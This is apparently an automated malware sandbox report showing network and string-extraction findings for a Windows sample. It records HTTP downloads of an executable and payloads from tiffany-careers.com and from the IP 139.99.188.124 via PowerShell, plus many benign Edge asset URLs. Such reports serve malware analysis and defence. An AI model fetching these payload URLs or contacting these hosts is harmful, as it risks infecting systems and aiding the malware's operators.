Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.245.121
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.245.121
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.245.121
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.245.121
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.245.121
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.245.121
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.245.121
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3E87C InternetReadFile,19_2_00007FF656D3E87C
Source: global trafficHTTP traffic detected: GET /FILEANH HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /New_2025.webp HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418563_16RSKIH5RQZW91ZBH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418564_10W6V5F7I280O8R44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381742051_1MZLGS7MGWEW2J3U5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381742050_1SU74Q4K5S59B84Q9&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418547_1N5DXBL93QHFGMSRD&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418548_1UEU8RPM3S7H7G0D8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.19.drString found in binary or memory: http://139.99.188.124/QWCheljD.txt
Source: PefjSkkhb.exe, 00000013.00000002.2359609213.00000278E57B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/kiiMf
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4845000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.HJ8
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 00000007.00000002.3392600093.0000016D6AE00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2347436380.000001BE1FDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2525830239.00000281C355C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2306595071.000001BE0FD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B34E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp, Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000023.00000000.2584449237.0000000000BA9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000008.00000002.2306595071.000001BE0FD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B34E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: 019e40df-d678-4807-af6d-bd6fccbc228a.tmp.14.drString found in binary or memory: https://assets.msn.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://bard.google.com/
Source: Reporting and NEL.14.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: offscreendocument_main.js.13.dr, service_worker_bin_prod.js.13.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: manifest.json.13.drString found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.13.drString found in binary or memory: https://chromewebstore.google.com/
Source: 078cbb06-9041-42f1-a283-8417e7784ea4.tmp.14.dr, 019e40df-d678-4807-af6d-bd6fccbc228a.tmp.14.drString found in binary or memory: https://clients2.google.com
Source: 078cbb06-9041-42f1-a283-8417e7784ea4.tmp.14.dr, 019e40df-d678-4807-af6d-bd6fccbc228a.tmp.14.drString found in binary or memory: https://clients2.googleusercontent.com
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: Reporting and NEL.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: 019e40df-d678-4807-af6d-bd6fccbc228a.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.log0.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log0.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.13.dr, ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.13.dr, ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: HubApps Icons.13.dr, ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.13.dr, ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: HubApps Icons.13.dr, ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
